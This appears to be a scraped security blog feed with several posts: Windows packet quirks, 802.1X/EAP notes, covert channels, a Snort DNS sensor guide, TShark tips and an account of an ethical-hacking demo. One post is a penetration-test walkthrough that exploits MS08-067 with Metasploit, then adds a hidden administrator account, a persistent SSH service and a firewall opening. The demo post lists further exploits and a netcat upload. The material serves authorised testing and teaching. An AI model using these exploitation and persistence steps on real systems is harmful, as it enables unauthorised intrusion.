</div>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2320276621879394553.post-78798615651324369722009-10-06T13:49:00.000-07:002009-10-06T14:30:14.248-07:00Windows 7 - ICMP message type 12, code 0Send a tcp packet to any port with the IP "more fragments" bit set to a Windows 7 host. The packet can be sent with no application payload, and arbitrary tcp flags.<br /><br />Windows 7 will send back an ICMP message type 12, code 0 reply indicating a "parameter problem".<br /><br />Now repeat the experiment, only increase the payload to 92 bytes. Anything greater than 91 will not result in the ICMP return packet.<br /><br />Hmmm....<br /><br /><span style="font-family:courier new;font-size:85%;">17:24:10.268903 IP (tos 0x0, ttl 64, id 2468, offset 0, flags [+], proto: TCP (6), length: 40) 192.168.100.1.445 > 192.168.100.129.445: S, cksum 0x3984 (correct), 950565187:950565187(0) win 512</span><span style="font-size:85%;"><br /></span><span style="font-family:courier new;font-size:85%;"> <br />0x0000: 4500 0028 09a4 2000 4006 0759 c0a8 6401 E..(....@..Y..d.</span><span style="font-size:85%;"><br /></span><span style="font-family:courier new;font-size:85%;"> 0x0010: c0a8 6481 01bd 01bd 38a8 7943 2ede 4647 ..d.....8.yC..FG</span><span style="font-size:85%;"><br /></span><span style="font-family:courier new;font-size:85%;"> 0x0020: 5002 0200 3984 0000 P...9...</span><span style="font-size:85%;"><br /></span><span style="font-family:courier new;font-size:85%;"><br /><br />17:24:10.269784 IP (tos 0x0, ttl 128, id 20600, offset 0, flags [none], proto: ICMP (1), length: 68) 192.168.100.129 > 192.168.100.1: ICMP parameter problem - octet 0, length 48</span><span style="font-size:85%;"><br /></span><span style="font-family:courier new;font-size:85%;"> IP (tos 0x0, ttl 64, id 2468, offset 0, flags [+], proto: TCP (6), length: 40) 192.168.100.1.445 > 192.168.100.129.445: S, cksum 0x3984 (correct), 950565187:950565187(0) win 512</span><span style="font-size:85%;"><br /><br /></span><span style="font-family:courier new;font-size:85%;"> 0x0000: 4500 0044 5078 0000 8001 a06d c0a8 6481 E..DPx.....m..d.</span><span style="font-size:85%;"><br /></span><span style="font-family:courier new;font-size:85%;"> 0x0010: c0a8 6401 0c00 3dec 0000 0002 4500 0028 ..d...=.....E..(</span><span style="font-size:85%;"><br /></span><span style="font-family:courier new;font-size:85%;"> 0x0020: 09a4 2000 4006 0759 c0a8 6401 c0a8 6481 ....@..Y..d...d.</span><span style="font-size:85%;"><br /></span><span style="font-family:courier new;font-size:85%;"> 0x0030: 01bd 01bd 38a8 7943 2ede 4647 5002 0200 ....8.yC..FGP...</span><span style="font-size:85%;"><br /></span><span style="font-family:courier new;font-size:85%;"> 0x0040: 3984 0000 9...</span>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2320276621879394553.post-80632885393264363842009-06-11T05:53:00.000-07:002010-06-04T14:07:45.949-07:00802.1X and EAPEAP = Extensible Authentication Protocol which is a universal layer 2 based authentication protocol use on point-to-point, wired, and wireless networks. EAP is used by 802.1X for port based, network access authentication. There are many EAP types however the most commonly used are EAP-PEAP, and EAP-TTLS.<br />
<br />
1) EAP-TLS is well supported and use by wireless vendors although a challenge to implement as it requires both a client-side and server-side certificate. General comment is that EAP-TLS is the best security option but also the most difficult to implement.<br />
<br />
2) EAP-TTLS was co-developed by Funk and Certicom. It differs from EAP-TLS in that the server only needs to be authenticated to the client by certificate (signed by public or private CA). 802.1X supplicants need to properly verify the certificate otherwise potential for man in the middle interception exists (when used with wireless). Microsoft does not natively support EAP-TTLS.<br />
<br />
3) EAP-PEAP is a joint effort of Cisco, Microsoft, and RSA and is widely in use. Similar to EAP-TTLS, MS-CHAPv2 login credentials are protected by TLS during the authentication process. Bottom line is that if you are dealing with the Microsoft 802.1X supplicant (which most of us probably would be), then PEAP is your friend.<br />
<br />
There seems to be very little in the way of documentation on the net with regard to how 802.1X port authentication and EAP-PEAP actually function. It is an interesting protocol dance when you have Protected Extensible Authentication Protocol (PEAP) involving layer 2 traffic from the 802.1X supplicant, protected by TLS within the EAP over LAN (EAPOL) transactions, and also with the TLS data carried within the Radius attribute value pairs.<br />
<br />
The server side certificate presented via Radius back to the client may be a public CA signed, or internal/privately signed certificate. In either case, it is critical that the 802.1X supplicant (client station) has a properly imported root certificate.<br />
<br />
With regard to the EAPOL (EAP over LAN) transactions, a lot of documentation I have read fails to recognize that an EAP-Request/Identity frame is always initiated from the switch first with link up. I only mention this point as it came to light in recent EAPOL debugging/diagnostic work I was involved in.<br />
<br />
And BTW, if you are ever looking at 802.1X/PEAP/Radius authentication traffic, a useful 'tcpdump' filter is as follows:<br />
<br />
'ether proto 0x888e OR udp port 1812'<br />
<br />
This assumes that Radius traffic is being carried on UDP port 1812 and that you are able to mirror/span the data from your AP/switch (authenticator) as well as your client/supplicant.<br />
<br />
The EAP transactions occur at OSI layer 2 between the supplicant and the authenticator while the synchronized Radius transactions occur at OSI layer 3 between the AP/switch authenticator and the Radius server. The TLS certificate and data is carried both within the EAP traffic, and within the Radius attribute-value pairs between client/supplicant and Radius server.<br />
<br />
Thus, your network management network better be functioning reliably!<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIoeFEX7AnZf_BvLS7Bd9qn_2rHnmeQigVbBGet1XoLRqZfB-SP3KJLF2MojcWXnxVAqqNs9_-aP_dVU-ZU01Q6R1_0RJo1ZN9C7LaQ0lgMLCXN9HpBdnHTz3Rc4R9GEKpnaJy3EHNssY/s1600-h/eap-dot1x.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5346055779099803522" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIoeFEX7AnZf_BvLS7Bd9qn_2rHnmeQigVbBGet1XoLRqZfB-SP3KJLF2MojcWXnxVAqqNs9_-aP_dVU-ZU01Q6R1_0RJo1ZN9C7LaQ0lgMLCXN9HpBdnHTz3Rc4R9GEKpnaJy3EHNssY/s400/eap-dot1x.jpg" style="cursor: pointer; display: block; height: 184px; margin: 0px auto 10px; text-align: center; width: 400px;" /></a><br />
<br />
So having written all that, I wonder if we can use the EAP-Response/Identify frame to send an extremely large string or perhaps even 'printf' based format string to exploit weaknesses in the authenticator or Radius code. At minimum, a potential denial of service could exist if not worse condition.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2320276621879394553.post-34481004556662729992009-06-10T18:48:00.000-07:002009-06-11T19:20:52.887-07:00Covert Channel Possibilities!The IT network and security community often thinks of covert channels in terms of what has already been detected. A good example is Loki, and other ICMP variants. However, we should not forget that IP, TCP, UDP, and ICMP headers and payloads contain opportunities to hide data in storage channels.<br /><br />Header and application payload fields that can potentially be used for covert storage channels include the IP Identification field (16-bits), the TCP Initial Sequence Number (32-bits), the DNS identification field (16-bits), the TCP timestamp option (32-bits x 2), a portion (or all) of the source IP address, a TCP or UDP source port (16-bits) just to name a few.<br /><br />Some of these fields are deliberately (and highly) randomized during certain normal protocol transactions. Thus, if we combine storage of covert data with symmetric key encryption, and nicely crafted bogus payload, we can yield a highly effective and hard to detect channel.<br /><br />When doing protocol and intrusion analysis, we should be careful to look at packet timing, and uni-directional versus bi-directional nature of protocol transactions. You never know when you might be witnessing a covert storage or timing channel at work, and you might never really discover the content.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2320276621879394553.post-54925244898722868982009-01-18T15:08:00.000-08:002009-01-18T15:43:16.197-08:00Installing OpenSSH on Windows via command shellDuring a network penetration test, Windows command shell access is often obtained through some sort of exploit. If, for example, Metasploit is being used, command shell access can be delivered as the payload of a buffer overflow exploit. Or if perhaps the Meterpreter is being used, command shell access can be had by executing a CMD.EXE and interacting directly with it, or perhaps by having NETCAT shovel a command shell back to the penetration tester.<br /><br />The challenge is that command shell access is not equivalent to full terminal access. The command shell may produce strange output due to control characters. Some commands may not function normally if they depend on the use of control sequences. If using NETCAT to shovel a shell, entering CTRL-C to terminate some command can end up terminating your shell!<br /><br />If a penetration tester is permitted to modify the target server, then a more consistent, fully functional terminal level access will greatly help during the testing process. A number of choices exist including activating the telnet service, activating Microsoft terminal services (remote desktop protocol), installing VNC (www.realvnc.com), or installing OpenSSH for Windows. VNC is a great choice as it provides an easy command line installation with files residing in a single directory, and only a limited number of registry entries, however it offers no encryption. The telnet service offers no encryption either.<br /><br />OpenSSH for windows (<a href="http://sshwindows.sourceforge.net/">http://sshwindows.sourceforge.net/</a>) is a minimized Cygwin (<a href="http://www.cygwin.com/">http://www.cygwin.com</a>) environment that has been customized to support only SSH. It supports SSH command line terminal access, and secure copy / secure file transfer. Because the setup process in the OpenSSH packages uses the GUI, you have to perform some steps to customize your own command line only installation.<br /><br /><br /><span style="font-weight: bold;">Preparing for a custom command line OpenSSH Installation in your lab</span><br /><br />The basic steps to prepare a command line OpenSSH installation for Windows are as follows:<br /><br />1. Download the setupssh.exe installation package from <a href="http://sshwindows.sourceforge.net/download">http://sshwindows.sourceforge.net/download</a><br /><br />2. Run the GUI installer package on your Windows lab/test machine. I suggest accepting the default program location of C:\Program Files\OpenSSH<br /><br />3. Get a full copy of all of the files under the directory C:\Program Files\OpenSSH onto a USB flash drive or other favorite media. Copy recursively with XCOPY and make sure you fully retain the directory structure.<br /><br />4. Export the following registry keys using the REG EXPORT command as follows:<br /><br /> REG EXPORT “HKLM\SOFTWARE\Cygnus Solutions” 1.REG<br /> REG EXPORT “HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd” 2.REG<br /> REG EXPORT “HKLM\SYSTEM\ControlSet001\Services\OpenSSHd” 3.REG<br /><br />5. Concatenate all of these registry files together into one file.<br /> TYPE 1.REG 2.REG 3.REG >OPENSSH.REG<br /><br />6. Save this OPENSSH.REG file into your local copy of all of the openssh directory structure.<br /><br /><br /><span style="font-weight: bold;">Performing an installation via command shell</span><br /><br />Now that you have all of this data saved on your USB thumb drive, lets assume that our penetration testing machine is a CentOS Linux operating system with IP address of 192.168.1.37, and that our target is a Windows 2003 SP0 machine with IP address of 192.168.1.40. Our penetration testing Linux machine has our OpenSSH package files mounted under /mnt/PenTestTools/win32/OpenSSH.<br /><br />Our target happens to have the MS08-067 Server Service RPC vulnerability. Below is an example of how we exploit this vulnerability using Metasploit (www.metasploit.com) with the Meterpreter payload, upload our OpenSSH server files, add a new username, perform some minimal configuration and start the OpenSSH service.<br /><br /><br /><span style="font-weight: bold;">Exploiting the Vulnerability</span><br /><br />[root@localhost framework-3.2]# nc -v 192.168.1.40 445<br />Connection to 192.168.1.40 445 port [tcp/microsoft-ds] succeeded!<br />[root@localhost framework-3.2]# ./msfconsole<br /> <br />msf > search exploits ms08_067<br />[*] Searching loaded modules for pattern 'ms08_067'...<br />Exploits<br />========<br />Name Description <br />---- ----------- <br />windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption<br />msf > use windows/smb/ms08_067_netapi<br /><br />msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp<br />PAYLOAD => windows/meterpreter/bind_tcp<br />msf exploit(ms08_067_netapi) > set RHOST 192.168.1.40<br />RHOST => 192.168.1.40<br />msf exploit(ms08_067_netapi) > set TARGET 5<br />TARGET => 5<br />msf exploit(ms08_067_netapi) > show options<br /><br />... truncated output ...<br />Exploit target:<br /><br />Id Name <br />-- ---- <br />5 Windows 2003 SP0 Universal<br /><br /><br />msf exploit(ms08_067_netapi) > exploit<br />[*] Started bind handler<br />[*] Triggering the vulnerability...<br />[*] Transmitting intermediate stager for over-sized stage...(191 bytes)<br />[*] Sending stage (2650 bytes)<br />[*] Sleeping before handling stage...<br />[*] Uploading DLL (75787 bytes)...<br />[*] Upload completed.<br />[*] Meterpreter session 1 opened (192.168.1.37:45633 -> 192.168.1.40:4444)<br /><br />meterpreter > sysinfo<br />Computer: SYSTEM-HJ28HHGL7N<br />OS : Windows .NET Server (Build 3790, ).<br /><br /><br /><span style="font-weight: bold;">Uploading your OpenSSH Files</span><br /><br />meterpreter > lcd /mnt/PenTestTools/win32/OpenSSH<br />meterpreter > lpwd<br />/mnt/PenTestTools/win32/OpenSSH<br />meterpreter > cd \<br />meterpreter > cd "Program Files"<br />meterpreter > mkdir openssh<br />Creating directory: openssh<br />meterpreter > cd openssh<br />meterpreter > pwd<br />C:\Program Files\openssh<br />meterpreter > upload -r . .<br />[*] uploading : ./uninstall.exe -> .\uninstall.exe<br />[*] uploaded : ./uninstall.exe -> .\uninstall.exe<br />[*] mirroring : ./bin -> .\bin<br />[*] uploading : ./bin/chmod.exe -> .\bin\chmod.exe<br />[*] uploaded : ./bin/chmod.exe -> .\bin\chmod.exe<br />[*] uploading : ./bin/chown.exe -> .\bin\chown.exe<br />[*] uploaded : ./bin/chown.exe -> .\bin\chown.exe<br />[*] uploading : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll<br />[*] uploaded : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll<br />.... lots of output truncated ....<br /><br />meterpreter > execute -f cmd.exe –i<br />Process 848 created.<br />Channel 66 created.<br /><br /><br /><br /><span style="font-weight: bold;">Modifying the Registry and Adding Your Own Username</span><br /><br />Here, we import all of our registry keys, then add our own username making sure to put it into the administrators group. Then we create the passwd and group files that OpenSSH needs for authentication purposes.<br /><br /><br />Microsoft Windows [Version 5.2.3790]<br />(C) Copyright 1985-2003 Microsoft Corp.<br />C:\Program Files\openssh>whoami<br />whoami<br />nt authority\system<br /><br />C:\Program Files\openssh>reg import openssh.reg<br />reg import openssh.reg<br />The operation completed successfully.<br /><br />C:\Program Files\openssh>net user inet_p0wned gameover /add<br />net user inet_p0wned gameover /add<br />The command completed successfully.<br /><br /><br />C:\Program Files\openssh>net localgroup administrators inet_p0wned /add<br />net localgroup administrators inet_p0wned /add<br />The command completed successfully.<br /><br /><br />C:\Program Files\openssh>cd etc<br />cd etc<br /><br />C:\Program Files\openssh\etc>..\bin\mkpasswd -l >passwd<br />..\bin\mkpasswd -l >passwd<br />C:\Program Files\openssh\etc>..\bin\mkgroup -l >group<br />..\bin\mkgroup -l >group<br /><br />C:\Program Files\openssh\etc>sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto<br />sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto<br />[SC] CreateService SUCCESS<br /><br /><br /><br /><span style="font-weight: bold;">Start the OpenSSH Service</span><br /><br />C:\Program Files\openssh\etc>sc start opensshd<br />sc start opensshd<br />SERVICE_NAME: opensshd<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> STATE : 2 START_PENDING<br /> (NOT_STOPPABLE, NOT_PAUSABLE,<br />IGNORES_SHUTDOWN))<br /> WIN32_EXIT_CODE : 0 (0x0)<br /> SERVICE_EXIT_CODE : 0 (0x0)<br /> CHECKPOINT : 0x0<br /> WAIT_HINT : 0x7d0<br /> PID : 1916<br /> FLAGS :<br /><br />C:\Program Files\openssh\etc>sc query opensshd<br />sc query opensshd<br />SERVICE_NAME: opensshd<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> STATE : 4 RUNNING<br /> (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN))<br /> WIN32_EXIT_CODE : 0 (0x0)<br /> SERVICE_EXIT_CODE : 0 (0x0)<br /> CHECKPOINT : 0x0<br /> WAIT_HINT : 0x0<br /><br />C:\Program Files\openssh\etc>netsh firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24<br /><br />The following command was not found: firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24**<br /><br />**Note: adding a port for the firewall is necessary if the firewall exists. If not, then you will get the command not found error message. It is a good idea to restrict the source networks so that you don’t leave a gaping opportunity while testing.<br /><br />C:\Program Files\openssh\etc>exit<br />exit<br />meterpreter > quit<br /><br />[*] Meterpreter session 1 closed.<br />msf exploit(ms08_067_netapi) > quit<br /><br /><br /><br /><br /><br /><span style="font-weight: bold;">Now, lets go ahead and SSH into our Windows server to check if things worked!</span><br /><br /><br />root@localhost:~/framework-3.2]# ssh inet_p0wned@192.168.1.40<br />The authenticity of host '192.168.1.40 (192.168.1.40)' can't be established.<br />RSA key fingerprint is ab:c8:bf:9f:b2:38:32:1d:6f:2b:34:a5:d0:99:dc:49.<br />Are you sure you want to continue connecting (yes/no)? yes<br />Warning: Permanently added '192.168.1.40' (RSA) to the list of known hosts.<br /><br />OpenSSH for Windows. Welcome aboard!<br /><br />inet_p0wned@192.168.1.40's password:<br />Could not chdir to home directory /home/inet_p0wned: No such file or directory<br />Microsoft Windows [Version 5.2.3790]<br />(C) Copyright 1985-2003 Microsoft Corp.<br />C:\Program Files\OpenSSH><br />C:\Program Files\OpenSSH>whoami<br />system-hj28hhgl7n\inet_p0wned<br /><br />C:\Program Files\OpenSSH>exit<br />Connection to 192.168.1.40 closed.<br />[root@localhost framework-3.2]#<br /><br /><br /><span style="font-weight: bold;">Cleaning up</span><br /><br />To clean up everything when you are finished, you need to delete the OpenSSH service, delete the registry keys and remove all of the relevant files. The following recipe should work reasonably well from a command shell. Remember that you cannot be using OpenSSH when deleting the service! So, you may need to exploit again with shell code before removing it.<br /><br />C:\> SC STOP opensshd<br />C:\> SC DELETE opensshd<br />C:\> REG DELETE “HKLM\SOFTWARE\Cygnus Solutions” /f /va<br />C:\> REG DELETE “HKLM\SYSTEM\ControlSet001\Services\OpenSSHd” /f /va<br />C:\> REG DELETE “HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd” /f /va<br /><br />C:\> CD "\Program Files"<br />C:\Program Files> RMDIR /Q /S opensshd<br />C:\Program Files> NETSH FIREWALL DELETE PORT TCP 22<br />C:\Program Files> NET USER inet_p0wned /DELETEUnknownnoreply@blogger.com2tag:blogger.com,1999:blog-2320276621879394553.post-78032989862963781562008-11-02T14:59:00.000-08:002008-11-02T15:41:14.828-08:00Focused IDS Sensor for DNSMany enterprises have what is known as a split domain name system (DNS) configuration. Split DNS is where you serve your internal network with one (or perhaps a pair) of DNS servers, but forward all unresolved requests to another DNS server(s) that lives within your DMZ. Using split DNS provides some security protection for your internal DNS servers, and performance benefit in that the internal servers do not have to cache external network information. <br /><br />Additional security protection can be provided by carefully controlling your network perimeter (anti-spoofing and bogon filtering for example), and carefully configuring your external DNS servers to only respond to DNS requests that are within your network domain.<br /><br />In recent times, DNS cache poisoning has risen as a significant challenge yet again. It has been noted that DNS is fundamentally flawed due to it's weak reliance on a matching DNS identification and packet source information in query responses. Though widespread deployment of DNSSEC (secure) is the correct solution, it has not gained in popularity enough at this time.<br /><br />Beyond ensuring that you have correct vendor patches, which are written to ensure significant entropy in the randomly chosen DNS identification field, and UDP source ports, there needs to be another method to indicate that your DNS cache may be poisoned. <br /><br />The two methods I find effective are to use the CAIDA project's DNS statistics collector (DSC), and to also deploy a focused Intrusion Detection Sensor (IDS) with Snort running directly on my DNS servers.<br /><br />First of all, I would recommend becoming a registered snort user at <a href="http://www.snort.org/">www.snort.org</a> in order to stay within about one month's release of the up to date snort signatures. Then, assuming you are running a UNIX based system for your DNS server(s), download the latest snort source code which as of this writing is <a href="http://www.snort.org/dl/snort-2.8.3.1.tar.gz">snort-2.8.3.1.tar.gz</a>.<br /><br /><ol><li>Compile and install snort.</li><li>After installation, you should have a /etc/snort directory which contains a basic snort configuration file and the base set of rules.</li><li>Download the latest registered user rule set from snort.org and extact it inside the /etc/snort directory.</li><li>Now, start editing the /etc/snort/snort.conf file with your favorite text editor. In some installations, this file might be located in /etc/snort/rules.</li></ol><br />Key variables you must set in order to get snort functioning are as follows with examples:<br /><ul><li>HOME_NET = $eth0_ADDRESS</li><li>EXTERNAL_NET = !$HOME_NET</li><li>DNS_SERVERS = [172.16.1.1, 172.16.2.1]</li></ul>Since this is a focused sensor, I would suggest that the home network (HOME_NET) be set to the address of the DNS server itself. The external network variable can simply be anything that is not the home network.<br /><br />With regard to snort's preprocessors, you will need to keep <span style="font-weight: bold;">frag3</span> and <span style="font-weight: bold;">stream5</span> for both framentation and stream reassembly. Most importantly, the only remaining preprocessor you must have configured is the DNS preprocessor.<br /><br />To keep the sensor memory usage low, I would disable (by commenting out) all other preprocessors, such as ftp_telnet, http, dcerpc etc. You are deploying a sensor focused on DNS so lets keep it optimized and looking at DNS traffic!<br /><br />Next, go down to where the <span style="font-weight: bold;">include</span> statements reside, and comment out ALL of the includes listed except the one that reads: <span style="font-weight: bold;">include $RULE_PATH/dns.rules</span><br /><br />Now, test your configuration:<br /><br /><span style="font-weight: bold;">snort -p -c /etc/snort/snort.conf -A cmg -u_snort -g_snort -t/var/snort -l/var/snort/log<br /><br /></span>You should watch the output and make sure that there are no errors. Also, please note that the above command line uses the <span style="font-weight: bold;">-p</span> flag to disable promiscuous mode on your DNS server interface card. Again, let's remember that this is a focused sensor that is looking at the traffic going to/from this specific DNS system so your network card does NOT need to see other system traffic.<br /><br />Also, to be as secure as possible, always run as a non-root user, hence the use of the <span style="font-weight: bold;">-u_snort</span> and <span style="font-weight: bold;">-g_snort</span> to change the effective running user and group id respectively.<br /><br />Once you have checked that your configuration is operating as expected, then setup snort to run at boot time, and start the process as follows:<br /><br /><span style="font-weight: bold;">snort -pD -c/etc/snort/snort.conf -u_snort -g_snort -t/var/snort -l/var/snort/log</span><br /><br />I would additionally suggest adding <span style="font-weight: bold;">output alert_syslog</span> into your configuration. If things are setup properly, the false positive (noise) level should be very low, so I personally syslog ALL alerts to the console of the UNIX system itself as well as the root user to make sure that if any IDS alerts show up, I will see them.<br /><br />Following all these steps now gives you the equivalent of the canary in the coal mine. Your snort sensor is optimally configured to start sqawking if there are events such as a large number of DNS NXDOMAIN replies indicating potential cache posioning.<br /><br />The additional bonus is that you will quickly find applications on your network that are misbehaving and incorrectly beating on your DNS infrastructure when they should not be!<br /><br />Happy hunting.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2320276621879394553.post-2405398554242419382008-10-25T06:48:00.001-07:002008-10-25T09:07:30.091-07:00TShark - High performance packet captureWireshark users may not realize that there is a command line version of Wireshark, namely TShark, which provides superior packet capture performance. The challenge with Wireshark is that it has to update all of the window elements while at the same time capturing data, and it's defaults do not favor performance.<br /><br />When you are in a situation of very high traffic flow (like a DoS attack perhaps), you really need to capture as much of the data as possible to a file for later "post analysis". I always use a combination of setting up the TShark capture with Berkeley Packet Filter (BPF), and then plugging the RJ-45 Ethernet cable in after the capture is set to run.<br /><br />To run TShark within MS-Windows, you need to start a command window first.<br /><br /><span style="font-weight: bold;">Start -> Run -> CMD.EXE</span><br /><br />Find the directory that TShark is installed within. For a default Wireshark installation, it is probably as follows:<br /><br /><span style="font-weight: bold;">CD \Program Files\Wireshark</span><br /><br />Then, find out the HELP syntax from TShark:<br /><br /><span style="font-weight: bold;">tshark -h</span><br /><br />The first thing you must do is find out which network interface number you must use for the data capture.<br /><br />tshark -D shows all of the interfaces with an integer number in front of them. Windows understands all network interfaces by the long hexadecimal object identifier but you really don't want to have to remember that!<br /><br />example output:<br /><br />1. \Device\NPF_{11A468B6-C065-45F6-AB32-D69695A6F601} (MS Tunnel Interface Driver)<br />2. \Device\NPF_{A16900A3-020C-4B05-B430-4CD67527C189} (Realtek RTL8168B/8111B PCI-E Gigabit Ethernet NIC)<br /><br /><br />Now, select the right interface, capture some data and write it directly to a file. For example:<br /><br /><span style="font-weight: bold;">tshark-i 2 -s 200 -w example.pcap -f "tcp[13] = 0x14"</span><br /><br />The particular example shown above captures data with the 13th offset of the TCP header equal to hexadecimal of 0x14. This happens to be packets that have the TCP flags of RST and ACK set. The -i flag is used to select the capture interface.<br /><br />TShark will count the packets captured, and then you simply use the CTRL-C keyboard sequence to stop the capture when finished. After that, open your example.pcap file within Wireshark for full analysis. The (.pcap) file extension ensures you could simply double click the file itself.<br /><br />With regard to the -s (snap length) flag, be aware that TShark will default to a packet capture length of 65,535 bytes, which given a standard 1514 MTU Ethernet frame size, will always capture the entire packet. Using a snaplen of 68 bytes makes the behavior of TShark identical to tcpdump default behavior.<br /><br />Early versions of TShark did not allow a snaplen that is less than 68 bytes, however I believe there is a source patch that has fixed this now for those who like capturing headers only! Some quick calculations:<br /><br /><ul><li> Ethernet header = 14 bytes</li><li> IPv4 header (without options) = 20 bytes</li><li> TCP header (without options) = 20 bytes</li><li> Typical TCP header options for Windows Vista = 12 bytes</li><li> UDP header = 8 bytes</li></ul><br />If we examine a TCP SYN packet of a modern operating system, there are almost always TCP options attached. Windows Vista by default will use Max Segment Size (0x02), Window Scaling (0x03), and Selective Acknowledgement (0x04), as well as three No Operation (NOP = 0x01) options, giving a total of 12 bytes on a TCP SYN packet. The NOP option is used to pad the options data to even byte boundaries so that 32-bit processor code is happy!<br /><br />To capture a Windows Vista TCP SYN packet header under IPv4 with all options, we would need a minimal snap length as follows:<br /><br />14 (Ethernet header) + 20 (IP header) + 20 (TCP header) + 12 (TCP options) = 66 bytes.<br /><br />If you want to throw in some payload data, then add more to the snap length from there. I find that a snap length of about 200 gives good performance and captures a reasonable amount of data.<br /><br />Keep your goals in mind! If you were capturing traffic that is a Samba CIFS file read for example, you can be pretty sure that the server to client TCP packets will have 1514 bytes of data, so use the default snaplen!<br /><br />With regard to the Berkeley Packet Filters (libpcap / BPF), the standard language syntax applies. So, if ever in need of help, you can always get on a UN*X host somewhere and do 'man tcpdump' and learn all about the BPF syntax used within libpcap.<br /><br />Some ideas as follows:<br /><br /><span style="font-weight: bold;">-f "src host 1.2.3.4 and dst host 5.4.3.2"</span><br /><span style="font-weight: bold;">-f "dst port 22"</span><br /><span style="font-weight: bold;">-f "dst port 80"</span><br /><br />This last example shows some interesting ways to use the BPF syntax in combination with binary masking for very specific filter matches. In the below example, we are taking the 13th byte of the TCP header, shifting it left by a nibble (4 bits), then masking it with 0x40 which is binary 0010 0000, and finally testing it not equal to zero. In short, this will show any packet with the TCP RST flag set, but not exclusively that flag. (ie: would could see purely the RST flag, or perhaps even packets with RST+ACK, or some other illegal combination)<br /><br /><span style="font-weight: bold;">-f "(tcp[13] << 4 & 0x40) != 0"</span><br /><br />BPF syntax allows us to either use macros for matching (like: src port), or header field matches with integer offsets for the more sophisticated.<br /><br />Next time you need to capture traffic that is saturating some network link, give TShark some consideration for ensure a high degree of performance and better accuracy. <br /><br />Finally, for maximum network and security analyst safety, please always ensure you have the latest version of Wireshark and WinPCAP. There have been published exploits against these open source products and you don't want to be a victim!Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2320276621879394553.post-7860118685953761062008-10-24T03:11:00.001-07:002008-10-25T09:05:11.566-07:00Selling security via ethical hackingI had the pleasure recently in my organization to receive a directive similar to this. "Please develop a presentation that shows people why they need to be a participant in our new higher security network service".<br /><br />Ok, calling to all you creative geeks out there - wow... did I just get an order to "ethically hack"? My thinking was "yes" and this turned out to be one of the most fun assignments I had come across in a while.<br /><br />My first response was to get my "get out of jail free" card signed. (kudos to our friend Ed Skoudis for this one: <a href="http://www.counterhack.net/permission_memo.html">http://www.counterhack.net/permission_memo.html</a>)<br /><br />I then went away for 2 weeks to develop a quick and scary hacking demo that I could present in 45 minutes as a pure sales job for higher security. The structure of the demo ended up being a combination of some powerpoint slides, and some real live Metasploit fun.<br /><br />The powerpoint slides went as follows.<br /><ul><li>Describe the process of penetrating an enterprise network (scanning, recon, gaining access, keeping access, covering tracks). My colleague did a little google hacking show in the process.</li><li>Describe the C programming language and its flaws, paying special attention to how sub-routines in "C" are being exploited due to poor programming practices with respect to unbounded arrays.</li><li>Describe how sub-routines in "C" are embedded in just about all of the computing devices in use today</li><li>Show a Metasploit Demo!</li></ul><br />So, without further ado, lets talk about the Metasploit demo. First of all, I have to admit upfront that this was a time limited (canned) demo and I decided in the interests of keeping my job, not to find targets on our live network. (Although I may have done so if I had obtained enough advance recon. time)<br /><br />Here is what I did:<br /><ol><li>Setup a laptop with two virtual machines on it. One of the two had an unpatched WinXP host with no service packs, the second of the two was WinXP with service pack 2.</li><br /><li>Using a second MacBook, I scripted two flavors of MetaSploit attacks. I called them "direct network attacks", and "indirect network attacks". The exploits used for either flavor were basically the same, it simply depended on whether I attacked the target directly over a local network (back to back cable) or had the target come to my local web service.</li><br /><li>Direct network attack exploits used were as follows:</li><br /><ul><li>MS03-026: RPC-DCOM buffer overflow</li><li>MS03-049: Workstation Service NetAPI buffer overflow</li><li>MS04-007: Abstract Syntax Notation Library (ASN.1) buffer overflow</li><li>MS04-011: LSASS buffer overflow</li></ul><br /><li>InDirect (phishing style) exploits used were as follows:</li><br /><ul><li>MS07-?: Browser LoadAniIcon() in User32.dll</li><li>MS07/08-?: Browser generic activex overflow</li><li>MS06-001: GDI Library WMF SetAbortProc() </li></ul><br /><li>Payloads used were either the VNC DLL injection, Shellcode, or Meterpreter</li><br /><li>Finally, both laptops were at the front of the room with two projectors showing each screen. Sort of a "bad guy" and "innocent victim" approach.</li></ol>Starting with the unpatched WinXP machine, I did the most simple RPC DCOM buffer overflow, and pushed the reverse VNC DLL payload onto the target. On the MacBook, I then simply connected to the VNC server localhost addressed and displayed a mirror image of the screen.<br /><br />I had a fake looking file called "WIDGET-SALES.TXT" on the desktop which I displayed on the screen to show that the goal was all about gaining access to data (not necessarily about gaining root/system).<br /><br />I then moved onto the second virtual machine to show a typical phishing attempt. Between my colleague and I, we faked up a google mail page with a URL link in it as the browser home page. On the MacBook, I launched my MetaSploit web listener with the LoadAniIcon() sploit as the payload, and MeterPreter as the payload.<br /><br />On the WinXP-SP2 virtual, I showed the user clicking on the "phishing URL" within the google email page (from IE). The buffer overflow transpired, and we launched Meterpreter.<br /><br />Using a meterpreter script, I did the following:<br /><ul><li>created a hidden directory</li><li>uploaded netcat.exe</li><li>poked a hole in the Windows firewall on port 8888 with a service name of "msc".</li><li>tweaked the 